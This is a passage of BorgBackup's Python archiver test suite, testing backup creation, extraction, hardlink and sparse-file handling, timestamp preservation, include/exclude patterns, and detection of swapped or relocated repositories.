self.repository_path = os.path.join(self.tmpdir, 'repository')
self.repository_location = self.prefix + self.repository_path
self.input_path = os.path.join(self.tmpdir, 'input')
self.output_path = os.path.join(self.tmpdir, 'output')
self.keys_path = os.path.join(self.tmpdir, 'keys')
self.cache_path = os.path.join(self.tmpdir, 'cache')
self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
os.environ['BORG_KEYS_DIR'] = self.keys_path
os.environ['BORG_CACHE_DIR'] = self.cache_path
os.mkdir(self.input_path)
os.chmod(self.input_path, 0o777) # avoid troubles with fakeroot / FUSE
os.mkdir(self.output_path)
os.mkdir(self.keys_path)
os.mkdir(self.cache_path)
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
with open(self.patterns_file_path, 'wb') as fd:
fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
self._old_wd = os.getcwd()
os.chdir(self.tmpdir)
def tearDown(self):
os.chdir(self._old_wd)
# note: ignore_errors=True as workaround for issue #862
shutil.rmtree(self.tmpdir, ignore_errors=True)
setup_logging()
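    # Run a borg command, assert the expected exit code and return its output
    # with pure-python msgpack warnings filtered out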
def cmd(self, *args, **kw):
exit_code = kw.pop('exit_code', 0)
fork = kw.pop('fork', None)
binary_output = kw.get('binary_output', False)
if fork is None:
fork = self.FORK_DEFAULT
ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
if ret != exit_code:
print(output)
self.assert_equal(ret, exit_code)
# if tests are run with the pure-python msgpack, there will be warnings about
# this in the output, which would make a lot of tests fail.
pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
empty = b'' if binary_output else ''
output = empty.join(line for line in output.splitlines(keepends=True)
if pp_msg not in line)
return output
def create_src_archive(self, name):
self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
def open_archive(self, name):
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, name)
return archive, repository
def open_repository(self):
return Repository(self.repository_path, exclusive=True)
def create_regular_file(self, name, size=0, contents=None):
assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
filename = os.path.join(self.input_path, name)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
with open(filename, 'wb') as fd:
if contents is None:
contents = b'X' * size
fd.write(contents)
def create_test_files(self):
"""Create a minimal test case including all supported file types
"""
# File
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('flagfile', size=1024)
# Directory
self.create_regular_file('dir2/file2', size=1024 * 80)
# File mode
os.chmod('input/file1', 0o4755)
# Hard link
if are_hardlinks_supported():
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'hardlink'))
# Symlink
if are_symlinks_supported():
os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
self.create_regular_file('fusexattr', size=1)
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
# ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
# will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
# This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
# into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
# (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
xattr.setxattr(fn, b'user.foo', b'bar')
xattr.setxattr(fn, b'user.empty', b'')
# XXX this always fails for me
# ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
# same for newer ubuntu and centos.
# if this is supported just on specific platform, platform should be checked first,
# so that the test setup for all tests using it does not fail here always for others.
# xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
# FIFO node
if are_fifos_supported():
os.mkfifo(os.path.join(self.input_path, 'fifo1'))
if has_lchflags:
platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
try:
# Block device
os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
# Char device
os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
# File mode
os.chmod('input/dir2', 0o555) # if we take away write perms, we need root to remove contents
# File owner
os.chown('input/file1', 100, 200) # raises OSError invalid argument on cygwin
have_root = True # we have (fake)root
except PermissionError:
have_root = False
except OSError as e:
# Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
if e.errno not in (errno.EINVAL, errno.ENOSYS):
raise
have_root = False
time.sleep(1) # "empty" must have newer timestamp than other files
self.create_regular_file('empty', size=0)
return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_basic_functionality(self):
have_root = self.create_test_files()
# fork required to test show-rc output
output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
self.assert_in('borgbackup version', output)
self.assert_in('terminating with success status, rc 0', output)
self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
self.assert_in('Archive name: test.2', output)
self.assert_in('This archive: ', output)
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
list_output = self.cmd('list', '--short', self.repository_location)
self.assert_in('test', list_output)
self.assert_in('test.2', list_output)
expected = [
'input',
'input/bdev',
'input/cdev',
'input/dir2',
'input/dir2/file2',
'input/empty',
'input/file1',
'input/flagfile',
]
if are_fifos_supported():
expected.append('input/fifo1')
if are_symlinks_supported():
expected.append('input/link1')
if are_hardlinks_supported():
expected.append('input/hardlink')
if not have_root:
# we could not create these device files without (fake)root
expected.remove('input/bdev')
expected.remove('input/cdev')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
expected.remove('input/flagfile') # this file is UF_NODUMP
os.remove(os.path.join('input', 'flagfile'))
list_output = self.cmd('list', '--short', self.repository_location + '::test')
for name in expected:
self.assert_in(name, list_output)
self.assert_dirs_equal('input', 'output/input')
info_output = self.cmd('info', self.repository_location + '::test')
item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
self.assert_in('Number of files: %d' % item_count, info_output)
shutil.rmtree(self.cache_path)
info_output2 = self.cmd('info', self.repository_location + '::test')
def filter(output):
# filter for interesting "info" output, ignore cache rebuilding related stuff
prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
'All archives:', 'Chunk index:', ]
result = []
for line in output.splitlines():
for prefix in prefixes:
if line.startswith(prefix):
result.append(line)
return '\n'.join(result)
# the interesting parts of info_output2 and info_output should be same
self.assert_equal(filter(info_output), filter(info_output2))
@requires_hardlinks
def test_create_duplicate_root(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# test if created archive has 'input' contents twice:
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
# we have all fs items exactly once!
assert paths == ['input', 'input/a', 'input/a/hardlink', 'input/b', 'input/b/hardlink']
def test_init_parent_dirs(self):
parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
repository_path = os.path.join(parent_path, 'repository')
repository_location = self.prefix + repository_path
with pytest.raises(Repository.ParentPathDoesNotExist):
# normal borg init does NOT create missing parent dirs
self.cmd('init', '--encryption=none', repository_location)
# but if told so, it does:
self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
assert os.path.exists(parent_path)
def test_unix_socket(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(os.path.join(self.input_path, 'unix-socket'))
except PermissionError as err:
if err.errno == errno.EPERM:
pytest.skip('unix sockets disabled or not supported')
elif err.errno == errno.EACCES:
pytest.skip('permission denied to create unix sockets')
self.cmd('create', self.repository_location + '::test', 'input')
sock.close()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
with open(os.open(some_file, flags_noatime)) as file:
file.read()
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.create_test_files()
atime, mtime = 123456780, 234567890
have_noatime = has_noatime('input/file1')
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--atime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
if have_noatime:
assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
else:
# it touched the input file's atime while backing it up
assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
assert int(sto.st_birthtime * 1e9) == mtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
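    # Helpers for the repository swap detection tests: read the repository id and
    # overwrite it in the repository config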
def _extract_repository_id(self, path):
        with Repository(path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
def test_sparse_file(self):
def is_sparse(fn, total_size, hole_size):
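# check whether fn is stored sparsely: correct apparent size, fewer blocks allocated than the file size,
# and (if SEEK_HOLE/SEEK_DATA are available) a hole of the expected size at the start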
st = os.stat(fn)
assert st.st_size == total_size
sparse = True
if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
sparse = False
if sparse and has_seek_hole:
with open(fn, 'rb') as fd:
# only check if the first hole is as expected, because the 2nd hole check
# is problematic on xfs due to its "dynamic speculative EOF preallocation"
try:
if fd.seek(0, os.SEEK_HOLE) != 0:
sparse = False
if fd.seek(0, os.SEEK_DATA) != hole_size:
sparse = False
except OSError:
# OS/FS does not really support SEEK_HOLE/SEEK_DATA
sparse = False
return sparse
filename = os.path.join(self.input_path, 'sparse')
content = b'foobar'
hole_size = 5 * (1 << CHUNK_MAX_EXP) # 5 full chunker buffers
total_size = hole_size + len(content) + hole_size
with open(filename, 'wb') as fd:
# create a file that has a hole at the beginning and end (if the
# OS and filesystem supports sparse files)
fd.seek(hole_size, 1)
fd.write(content)
fd.seek(hole_size, 1)
pos = fd.tell()
fd.truncate(pos)
# we first check if we could create a sparse input file:
sparse_support = is_sparse(filename, total_size, hole_size)
if sparse_support:
# we could create a sparse input file, so creating a backup of it and
# extracting it again (as sparse) should also work:
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir(self.output_path):
self.cmd('extract', '--sparse', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
filename = os.path.join(self.output_path, 'input', 'sparse')
with open(filename, 'rb') as fd:
# check if file contents are as expected
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_equal(fd.read(len(content)), content)
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
def test_repository_swap_detection(self):
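# scenario: the encrypted repository is replaced by an unencrypted one reusing the same repository id;
# the client-side cache must detect the changed encryption method and refuse to write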
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
self.cmd('delete', '--cache-only', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
# Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
self.create_test_files()
# User initializes her repository with her passphrase
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Attacker replaces it with her own repository, which is encrypted but has no passphrase set
shutil.rmtree(self.repository_path)
with environment_variable(BORG_PASSPHRASE=''):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Delete cache & security database, AKA switch to user perspective
self.cmd('delete', '--cache-only', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
shutil.rmtree(get_security_dir(repository_id))
with environment_variable(BORG_PASSPHRASE=None):
# This is the part where the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
# is set, while it isn't. Previously this raised no warning,
# since the repository is, technically, encrypted.
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
os.rename(self.repository_path, self.repository_path + '_new')
with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location + '_new')
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location')) as fd:
location = fd.read()
assert location == Location(self.repository_location + '_new').canonical_path()
# Needs no confirmation anymore
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(security_dir)
self.cmd('info', self.repository_location + '_new')
for file in ('location', 'key-type', 'manifest-timestamp'):
assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location'), 'w') as fd:
fd.write('something outdated')
# This is fine, because the cache still has the correct information. security_dir and cache can disagree
# if older versions are used to confirm a renamed repository.
self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
self.cmd('init', '--encryption=none', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
# Ok: repository is known
self.cmd('info', self.repository_location)
# Ok: repository is still known (through security_dir)
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location)
# Needs confirmation: cache and security dir both gone (e.g. another host or rm -rf ~)
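# the 'info' call above re-created the local cache, so it has to be removed again here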
shutil.rmtree(self.cache_path)
shutil.rmtree(security_dir)
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('info', self.repository_location)
with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location)
def test_strip_components(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file')
self.cmd('create', self.repository_location + '::test', 'input')
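# the archived path is 'input/dir/file' (3 components): stripping all 3 must extract nothing,
# stripping fewer restores correspondingly deeper paths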
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
self.assert_true(not os.path.exists('file'))
with self.assert_creates_file('file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
with self.assert_creates_file('dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
with self.assert_creates_file('input/dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
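# layout: 'source' gets three additional hardlinks (abba, dir1/hardlink, dir1/subdir/hardlink),
# 'dir1/source2' gets one (dir1/aaaa)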
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
@requires_hardlinks
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_hardlinks(self):
self._extract_hardlinks_setup()
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# we need to get rid of permissions checking because fakeroot causes issues with it.
# On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
# On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
if sys.platform == 'darwin':
ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
else:
ignore_perms = ['-o', 'ignore_permissions']
with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
changedir(mountpoint):
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks1(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks2(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/dir1')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
@requires_hardlinks
def test_extract_hardlinks_twice(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# now test extraction
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
# if issue #5603 happens, extraction gives rc == 1 (triggering AssertionError) and warnings like:
# input/a/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/a/hardlink'
# input/b/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/b/hardlink'
# otherwise, when fixed, the hardlinks should be there and have a link count of 2
assert os.stat('input/a/hardlink').st_nlink == 2
assert os.stat('input/b/hardlink').st_nlink == 2
def test_extract_include_exclude(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/file1', )
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
# Create with regular expression exclusion for file4
self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Extract with regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Combine --exclude with fnmatch and regular expression
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
shutil.rmtree('output/input')
# Combine --exclude-from and regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
'--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
self.cmd("init", '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
self.create_regular_file("file333", size=1024 * 80)
self.cmd("create", self.repository_location + "::test", "input")
# Extract everything with regular expression
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "re:.*")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
shutil.rmtree("output/input")
# Extract with pattern while also excluding files
with changedir("output"):
self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
shutil.rmtree("output/input")
# Combine --exclude with pattern for extraction
with changedir("output"):
self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
